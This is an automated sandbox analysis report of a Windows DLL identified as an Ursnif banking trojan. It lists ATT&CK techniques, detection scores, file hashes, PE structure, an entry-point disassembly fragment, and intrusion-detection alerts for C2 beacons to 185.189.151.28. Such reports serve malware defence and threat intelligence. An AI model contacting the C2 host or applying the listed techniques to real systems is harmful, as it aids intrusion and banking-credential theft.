| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Rundll32 | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
| Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
| Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 48% | ReversingLabs | Win32.Trojan.Jaik | ||
| 100% | Joe Sandbox ML |
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link | Download |
|---|---|---|---|---|---|
| 100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Virustotal | Browse | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | URL Reputation | safe |
⊘No contacted domains info
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| true |
| unknown | |
| true |
| unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false |
| unknown | ||
| false |
| low | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
| IP |
|---|
| 192.168.2.1 |
| Joe Sandbox Version: | 34.0.0 Boulder Opal |
| Analysis ID: | 620333 |
| Start date and time: 04/05/202216:26:19 | 2022-05-04 16:26:19 +02:00 |
| Joe Sandbox Product: | CloudBasic |
| Overall analysis duration: | 0h 12m 2s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Sample file name: | tIJVb0BvkI.dll |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
| Number of analysed new started processes analysed: | 24 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 2 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Detection: | MAL |
| Classification: | mal100.bank.troj.evad.winDLL@24/15@0/2 |
| EGA Information: |
|
| HDC Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.42.16
- Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6756 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
| Time | Type | Description |
|---|---|---|
| 16:28:24 | API Interceptor |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| 185.189.151.28 | Get hash | malicious | Browse | ||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse |
⊘No context
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| AS-SOFTPLUSCH | Get hash | malicious | Browse |
| |
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
|
⊘No context
⊘No context
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 11606 |
| Entropy (8bit): | 4.883977562702998 |
| Encrypted: | false |
| SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
| MD5: | 243581397F734487BD471C04FB57EA44 |
| SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
| SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
| SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 403 |
| Entropy (8bit): | 5.058106976759534 |
| Encrypted: | false |
| SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
| MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
| SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
| SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
| SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 371 |
| Entropy (8bit): | 5.243693039966474 |
| Encrypted: | false |
| SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fqjzxs7+AEszI923fqe:p37Lvkmb6KzWWZE2r |
| MD5: | 2ED921F1330955F6AFDBB78FA7EAF8F4 |
| SHA1: | DB24B6EE559C4B25D8F92DD574D95BA7354D9E3D |
| SHA-256: | 2049BE5CF51E976F56978650CDF497A93641D8DC063B73D195CAF84D280AF0A1 |
| SHA-512: | 34AC6D80B7658F3787B740881DB9CC46724FC2586F8ED2B076E68C59F827C1C96C0E8BC0E0BF7CEE0CDB7C29815BF42F32FCBAC3CD395839E6B70EEE230F42B1 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 3584 |
| Entropy (8bit): | 2.6162239107618914 |
| Encrypted: | false |
| SSDEEP: | 24:etGS/8OmU0t3lm85xWAseO4zkQ64pfUPtkZfqmPVUWI+ycuZhNyoakST9PNnq:6dXQ3r5xNOnQfUuJqmd31ulna3rq |
| MD5: | 89A7D7E72EE4D68C3E0A507D7151F2CE |
| SHA1: | 89E10E370DE870B07976D508379CA908642B2D98 |
| SHA-256: | 4A403CD94F5DFDDF2C7813781CC570EB1D59EE10DD89774CC30B6AF3BA694B81 |
| SHA-512: | CAAB903ABFEB4B382EA85182B4820A82A1A6D70C5A1D1F697BFD31487290354F08005E7DBEF03C3FABBF9757D261EE6235F490E05824BADFCF04B45A47344A14 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 868 |
| Entropy (8bit): | 5.339579234164359 |
| Encrypted: | false |
| SSDEEP: | 12:xKIR37Lvkmb6KzWWZE2qKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KznE2qKaM5DqBVKVrdFAMBJTH |
| MD5: | 7A6F4E96A8D3B3A4C8AF231DDFFDE508 |
| SHA1: | 7EAE899EE47B06783142610DF27ACDEB0F686EC3 |
| SHA-256: | 00DF50BF3A6286D2D1FC5FA1951B22E04370B59802960AFC5BA77EBF21A6647C |
| SHA-512: | E75F43E8905AA37E43BDD7D976BB7A84CE521097FA58FEB2CF77436A3688C77F98B3AC12A5D7244DECCE53849D7CD1F25B53E899748E83B00A0DCBECAB3FD014 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 652 |
| Entropy (8bit): | 3.109354189483703 |
| Encrypted: | false |
| SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryZWoak7YnqqqW9PN5Dlq5J:+RI+ycuZhNyoakST9PNnqX |
| MD5: | D66AF6FAC9C9D4F1F78AE3A5DC5349E5 |
| SHA1: | 121B0B2A4DC1FC76073D0B9E738768EFF1FD34C9 |
| SHA-256: | 89C80B6EA10BBDEC2FDF0A878C09D3261BD42E09764A38D7F155B4E89894A06C |
| SHA-512: | E63B88E36F531BDCDBAE8816D7ED486CD6F6D6F9E307EE228599A213E022423900AC82CB4FAEAB3E30CB0BCBC077C3C9CFADD53FEF5C7D7CEF60E09011DAE54D |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 392 |
| Entropy (8bit): | 4.988829579018284 |
| Encrypted: | false |
| SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
| MD5: | 80545CB568082AB66554E902D9291782 |
| SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
| SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
| SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 371 |
| Entropy (8bit): | 5.229282846983885 |
| Encrypted: | false |
| SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fp+zxs7+AEszI923fR:p37Lvkmb6KzsWZE2J |
| MD5: | 8790EA5EBD20665A121C0467D12D0F98 |
| SHA1: | 560171D6E50CA52CB0F3179EE861D66954DFEE36 |
| SHA-256: | 82375D2231FDCA453FFBF57DE02F36378A4A1154A7B935AAC10D766F88CF0E40 |
| SHA-512: | 9A9EFBDC23DAF0910E5775EB4FE052B6CCA5439A4D5BF667151FCD0E055DE8F178233F7D1E209059352F00B1897FE448C9526631472401D581FBFC84AAE7C759 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 3584 |
| Entropy (8bit): | 2.59433860543945 |
| Encrypted: | false |
| SSDEEP: | 24:etGSV/u2Bg85z7xlfwZD6sgdWqtkZfoAWI+ycuZhNyakS6PNnq:6oYb5hFCD6FWdJo71ulya32q |
| MD5: | 56795B9251ADDEDC268AA628E143A9C5 |
| SHA1: | 16973C86A02C9B3D307AA25A3ADAD1F0F05F1325 |
| SHA-256: | E28D2E06D00EA056EE86C6793AED037BD75A6DFD1D63100378CDDE049C5A7C9E |
| SHA-512: | D0584C6B57A34BB7A3224B739870A4CB6BC87DA8A4D355C3A72AEED08106D3C019096A5627AB26D6CC007EF907725149BB21FF85E4D1D82BABA33923C0778051 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 868 |
| Entropy (8bit): | 5.3308047202087225 |
| Encrypted: | false |
| SSDEEP: | 12:xKIR37Lvkmb6KzsWZE2MKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzdE2MKaM5DqBVKVrdFAMBJTH |
| MD5: | AE184BFF32F3C82CDA83A7144041CC02 |
| SHA1: | EF366BDA7BD2A422BFF17C7DB20654DDF60A9507 |
| SHA-256: | EB31DBB8E96AB2747B6EA1425C55A681AC498DF8FC584F80075D000304F4B14E |
| SHA-512: | 91914CF1BD9069C69248288D4B0AFBF21A65DDEA90BFF2E9AAA24ADA08AE11580500A660418168C6DDCAAFF45F8EAE6813BE109C4A20C23ECB890E6DE4BD3439 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 652 |
| Entropy (8bit): | 3.0972257160637633 |
| Encrypted: | false |
| SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryexak7Ynqqj2PN5Dlq5J:+RI+ycuZhNyakS6PNnqX |
| MD5: | 41270E964816EC4C69225C4FC492514E |
| SHA1: | EA9457F4CBF230C99D3E4FF885FDE46E4BD45000 |
| SHA-256: | 41C6EE9B67E14F9616F9DD92586532D396E13BFE8F1D4B97C2930FA89ED740F1 |
| SHA-512: | 801BE92E1AE02CB2C71A1C8424A117F128AE761DC04FAD1503622F8AA0C934C9E96E9CD783ADB2060CFA0F3F28AA2E413782C1068AAE2EDF237CE640C70CF4A6 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1332 |
| Entropy (8bit): | 4.000171492218837 |
| Encrypted: | false |
| SSDEEP: | 24:HPizW9NProXxUuHjhKdNII+ycuZhNyoakST9PNnq92d:lProXCutKdu1ulna3rq9G |
| MD5: | D782BF3D7A8FDEB2AD18B0604344ECE8 |
| SHA1: | 424D88E90F7ECD6BF89F3DB4F71881A007BFC402 |
| SHA-256: | 5CF40AEAD24C13B102AD673AA371346B32E26D5BDF3D279B706C1F18B5AA15FB |
| SHA-512: | 6C2507E2313D03B691F0826C157C98BCE9F9C0ADFD029D0E5446CBB5E7DD6724D765AAF34426F5E53B58FEB35E192AC725578825A51E3AE2E16AF3C30E863F9C |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1332 |
| Entropy (8bit): | 3.9829744790376203 |
| Encrypted: | false |
| SSDEEP: | 24:HhizW9N7izUuHYFhKdNII+ycuZhNyakS6PNnq92d:TezUu4zKdu1ulya32q9G |
| MD5: | EE9EDF850E8759E45C86B471C8A75C98 |
| SHA1: | 450268A4ED02C66CD38EAB0754C27752A558A0B2 |
| SHA-256: | 9377B7E127BD8E34E1182E164391BFF0EC2E55A1037FDED981D8C489251A0B7D |
| SHA-512: | EF6F71F1E7454FE4AC2A7A34AEC2672DF8AA4F980B0116DA82E1D2D611899FBB9894D0CC59F4F37B75DD418F42C20DED9BDE9B359491AD7DB6EA9CD4804353EB |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Preview: |
| File type: | |
| Entropy (8bit): | 7.238626608026645 |
| TrID: |
|
| File name: | tIJVb0BvkI.dll |
| File size: | 442368 |
| MD5: | f28f39ada498d66c378fd59227e0f215 |
| SHA1: | 1c9c0584ad51f5be3f16b334d758c88b8cdb7b38 |
| SHA256: | 0a66e8376fc6d9283e500c6e774dc0a109656fd457a0ce7dbf40419bc8d50936 |
| SHA512: | 33e4035a35c204da87d5c5935dcc81020101cfb9001a1f08c6fe5c374d1bfaa888783c7d735d43de483d5b6235e883e797e0855bed548ff4aa8dbab1b8addf1b |
| SSDEEP: | 6144:rFpWDfyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rFpoFlJqYhiVDwGU8OqaX1WW3zNg7 |
| TLSH: | 5594F14977A11DBBEC0807761CF8C52B9B66BE2CA23A31DEA6683CFF7E175511048706 |
| File Content Preview: | MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5...... |
 | |
| Icon Hash: | 9068eccc64f6e2ad |
| Entrypoint: | 0x401430 |
| Entrypoint Section: | .text |
| Digitally signed: | false |
| Imagebase: | 0x400000 |
| Subsystem: | windows gui |
| Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
| DLL Characteristics: | TERMINAL_SERVER_AWARE |
| Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
| TLS Callbacks: | |
| CLR (.Net) Version: | |
| OS Version Major: | 5 |
| OS Version Minor: | 0 |
| File Version Major: | 5 |
| File Version Minor: | 0 |
| Subsystem Version Major: | 5 |
| Subsystem Version Minor: | 0 |
| Import Hash: | 0bedc9af0ed7cf2ba33cf662a24d448e |
| Instruction |
|---|
| push ebp |
| mov ebp, esp |
| add ecx, FFFFFFFFh |
| call 00007F191498005Ch |
| pop eax |
| pop eax |
| mov dword ptr [00414544h], eax |
| mov edx, dword ptr [00414660h] |
| sub edx, 00005289h |
| call edx |
| ret |
| int3 |
| push esi |
| mov eax, ebx |
| mov dword ptr [00414540h], eax |
| pop dword ptr [00414538h] |
| mov dword ptr [00414548h], ebp |
| mov dword ptr [0041453Ch], edi |
| sub dword ptr [00414548h], FFFFFFFCh |
| loop 00007F1914980005h |
| mov dword ptr [ebp+00h], eax |
| nop |
| pushfd |
| dec esp |
| mov bh, byte ptr [edx+20858137h] |
| inc edi |
| outsb |
| popad |
| adc bh, byte ptr [ebx-737236FDh] |
| rcr byte ptr [ebp-09h], 0000006Eh |
| xor dword ptr [edi+2C9A727Dh], edx |
| push edi |
| and eax, 921D5B11h |
| push ds |
| cmc |
| cdq |
| jmp 00007F19149800B1h |
| pop ebx |
| xor dword ptr [edx+72h], edi |
| ficom dword ptr [ecx+335A9032h] |
| jnp 00007F1914980087h |
| mov bl, 02h |
| ret |
| xchg eax, ebp |
| mov al, byte ptr [61B7C6D2h] |
| jnc 00007F191498002Fh |
| mov edx, 52F2559Ch |
| sti |
| sbb dword ptr [ecx+04h], ebp |
| pop ebx |
| inc esp |
| inc esi |
| dec edi |
| fsubr dword ptr [ebx] |
| cmovne ecx, eax |
| in al, D3h |
| jnl 00007F1914980048h |
| xchg eax, esi |
| xchg eax, esi |
| inc eax |
| pop es |
| cmpsd |
| pop edi |
| das |
| and byte ptr [esi-7Ch], bh |
| pop ecx |
| je 00007F1914980024h |
| pop esp |
| jl 00007F19149800BEh |
| xor al, byte ptr [esi+2Ch] |
| out dx, al |
| mov edi, F721E51Fh |
| pop esi |
| or dword ptr [edi+35h], ecx |
| scasb |
| rcl byte ptr [esi+7Ch], 00000040h |
| popfd |
| int3 |
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xb710 | 0xc000 | False | 0.0736897786458 | data | 1.02203160805 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.180541992188 | data | 3.71589026365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373697916667 | data | 6.02717783396 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_BITMAP | 0x62360 | 0x666 | data | English | United States |
| RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
| RT_ICON | 0x697d0 | 0xea8 | data | English | United States |
| RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
| RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
| RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States |
| RT_DIALOG | 0x6b540 | 0x120 | data | English | United States |
| RT_DIALOG | 0x6b660 | 0x158 | data | English | United States |
| RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States |
| RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States |
| RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States |
| RT_DIALOG | 0x6bb58 | 0xee | data | English | United States |
| RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States |
| RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
| DLL | Import |
|---|---|
| KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak |
| OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx |
| USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo |
| GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment |
| ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA |
| msvcrt.dll | strcoll, fgetwc, srand |
| Description | Data |
|---|---|
| LegalCopyright | A Company. All rights reserved. |
| InternalName | |
| FileVersion | 1.0.0.0 |
| CompanyName | A Company |
| ProductName | |
| ProductVersion | 1.0.0.0 |
| FileDescription | |
| OriginalFilename | myfile.exe |
| Translation | 0x0409 0x04b0 |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States |  |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 05/04/22-16:27:52.293372 05/04/22-16:27:52.293372 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49738 | 80 | 192.168.2.5 | 13.107.42.16 |
| 05/04/22-16:28:12.405919 05/04/22-16:28:12.405919 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| 05/04/22-16:28:12.829578 05/04/22-16:28:12.829578 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
